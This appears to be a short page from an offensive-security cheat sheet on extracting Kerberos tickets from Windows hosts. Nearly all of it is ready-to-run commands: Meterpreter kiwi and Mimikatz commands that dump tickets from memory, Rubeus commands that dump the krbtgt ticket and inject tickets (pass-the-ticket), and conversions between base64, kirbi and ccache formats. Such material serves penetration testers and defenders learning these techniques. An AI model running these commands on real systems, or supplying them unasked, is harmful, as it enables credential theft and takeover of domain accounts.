Extract Tickets

Meterpreter

meterpreter > kiwi_cmd kerberos::list
meterpreter > kerberos_ticket_list
meterpreter > kiwi_cmd kerberos::list /export

Rubeus

C:\> Rubeus.exe triage
C:\> Rubeus.exe dump /service:krbtgt /luid:0x263ab /nowrap
C:\> Rubeus.exe ptt /ticket:[...base64-ticket...]

Mimikatz

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt admin@krbtgt-vulnableone-local.kirbi

Convert Base64 to Kirbi

[System.IO.File]::WriteALLBytes("C:\Users\Redop\Desktop\admin.kirbi", [System.Convert]::FromBase64String("base64 ticket strings"))

Convert Kirbi to Ccache

└─$ impacket-ticketConverter admin.kirbi admin.ccache     
Impacket v0.11.0 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
PreviousOver Pass The HashNextPass The Ticket

Last updated